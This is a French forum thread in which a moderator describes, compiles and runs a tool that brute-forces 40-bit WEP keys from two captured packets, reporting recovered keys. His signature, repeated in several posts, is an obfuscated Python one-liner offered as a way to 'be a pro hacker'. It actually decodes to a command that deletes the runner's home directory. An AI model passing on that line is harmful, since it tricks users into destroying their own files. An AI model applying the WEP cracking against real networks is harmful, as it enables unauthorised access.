Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-10-2013 15:39:27

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

crack de wep 40 bits avec deux paquets.

Salut.

Je suis entrain de coder un outil qui parcourt l'espace des 40bits de la clef d'un vieux wep 40.
Il est là :
https://github.com/qolund/derp/tree/mas … eforce-wep

Il n'est pas encore parallélisé, et je compte utiliser OpenCL pour utiliser la GPU.

Un seul core sur mon i5 : 33jours.

Il faut deux paquets car il y a 5 octets de clef, et 4 octets de CRC pour valider une clef potentielle.
On aura donc en moyenne 255 clefs potentielles pout un paquet.
Avec deux paquets on prend l'intersection des deux groupes de clefs potentielles et c'est réglé.

Je le finis bientôt.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-10-2013 16:04:53

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : crack de wep 40 bits avec deux paquets.

Ça NE se fait pas de tirer sur les corbillards comme ça Spaw big_smile

Excellent.... bon, j'imagie que un core de i5 c'est un peu plus puissant que un

 lscpu
Architecture:          i686
CPU op-mode(s):        32-bit
Byte Order:            Little Endian
CPU(s):                1
On-line CPU(s) list:   0
Thread(s) per core:    1
Core(s) per socket:    1
Socket(s):             1
Vendor ID:             GenuineIntel
CPU family:            6
Model:                 14
Stepping:              8
CPU MHz:               1733.386
BogoMIPS:              3466.77
L1d cache:             32K
L1i cache:             32K
L2 cache:              1024K

donc je ne feras pas de test... tongue

J'avais une petite question.... est ce que le principe, qui m'échappe complètement dans les détails, ceci expliquant probablement ma question - serait adaptable et modulable avec 4 ivs, 8 ivs etc pour réduire le temps d'attaque ? 
On pourrait presque dire que tu as inventé le crack offline du WEP, deux chtis v's et c'est partit cool
Dans tous les cas ça mérite d'être intégré à aircrack-ng, kali, wikipedia et tutti cuanti
Moi je dis bravo l'artiste

triple uo in your face

upupup

Hors Ligne

#3 04-10-2013 09:28:18

Teeknofil
Membre Indéboulonnable
Inscription : 16-09-2013
Messages : 109
Site Web

Re : crack de wep 40 bits avec deux paquets.

Intéressant wink, ça fonctionne comment tu copie plusieurs fois le même paquets ?

Hors Ligne

#4 09-10-2013 08:14:38

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : crack de wep 40 bits avec deux paquets.

Non, en fait je bruteforce les 5 octets de la clef sur un seul paquet.
La fonction de validation de la clef est :

crc32(ARC4(IV+clef, msg)) = ARC4(IV+clef,crc_embarqué)

Pour aller plus vite, je déchiffre et calcule le crc32 au fur et à mesure.
Le crc embarqué est à la fin du paquet.

Je suis entrain de le paralléliser, et je pense attendre d'avoir des cours sur OpenCL (d'ici un mois) avant d'utiliser les GPU (et les CPU et les DSP (processeurs de traitement du signal), mais ce qui est intéressant c'est les GPU).

Statistiquement on a un octet de faux positifs (40bits de clef - 32bits de crc = 8bits), et on se sert d'un deuxième paquet pour valider l'unique bonne clef des 256 potentielles.

Je lis mes données depuis des exports de structures en C de wireshark, éditées avec un script pour connaître leur taille et leur nombre.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 14-10-2013 10:51:09

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : crack de wep 40 bits avec deux paquets.

Comme vous pourrez le voir ici :
https://github.com/qolund/derp/tree/mas … ionn%C3%A9

J'ai parallélisé mon code, et il fonctionne.
Il fournit bien statistiquement une clef potentielle toute les (2**32) clefs tentées, et on en a 2**40 = 256 * 2**32 à faire.
Parcourir un 2**32 me prend 30 minutes à peu près, je consomme des watts smile

Mais comme je n'ai pas encore un parc de machines (les machines de tp m'envoient balader hmm), je vais finir par utiliser OpenCL et faire brûler, en plus de mes CPUs, mes GPUs.

Un petit exemple de compilation : (je parcours le bon ensemble : xx:xx:xx:14x53)

gcc -Werror -Wall -ansi -pedantic -std=c99 main.c -o bin/assembleur.asm -pthread -O3 -S
gcc -Werror -Wall -ansi -pedantic -std=c99 main.c -o bin/executable -pthread -O3 -ggdb
./bin/executable
./bin/executable <0xinit> [0xlast]  (section = 0x??????derp)
./bin/executable 0x1453 0x4545
# 1453 -> 4545
??????1453
thread 0 returned 1 keys
potential key 0 : 6161101453
??????1457
^Cmake: *** [execute] Interrompre

Je n'ai pas parcouru tout l'ensemble des xx:xx:xx:14:xx, car on n'a qu'une clef valide (en moyenne), et il se trouve que c'est que c'est la bonne.

Il ne manque plus qu'un affichage de l'heure, une gestion des interruptions clavier et un log de l'état pour pouvoir le lancer fréquemment et parcourir les 40 bits smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 14-10-2013 12:56:45

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : crack de wep 40 bits avec deux paquets.

Nice cool
Et fais péter la GPU wink

Hors Ligne

#7 14-10-2013 15:38:32

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : crack de wep 40 bits avec deux paquets.

./bin/executable 0x1453 0x4545
Started on Mon Oct 14 16:25:33 2013
xx:xx:xx:14:53 -> xx:xx:xx:45:45
xx:xx:xx:14:53
Yay ! 61:61:10:14:53
Bruteforced 3 bytes in 78s.
xx:xx:xx:14:57
Bruteforced 3 bytes in 78s.
xx:xx:xx:14:5b
^C
Stopped at xxxxxx:145b

Et avec huit cœurs sur un i7, on fait 21s, mais le calcul du temps est pas encore exact.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 14-10-2013 17:52:21

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : crack de wep 40 bits avec deux paquets.

cool:cool::cool:

brillant smile

Hors Ligne

#9 15-10-2013 15:55:57

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : crack de wep 40 bits avec deux paquets.

Il y a maintenant un vrai dépôt git, et ça devrait compiler sous windows :
https://github.com/qolund/wep-yolo

Pour ce qui est du temps, su mon seul petit i5, j'en ai pour 5 jours.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#10 16-10-2013 08:19:04

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 008

Re : crack de wep 40 bits avec deux paquets.

Épilogue grâce aux 62 pc allumés cette nuit dans l'école :

grep Yay crackpot/*/*.txt -h
Yay ! ef:bb:5e:14:05

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.036 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]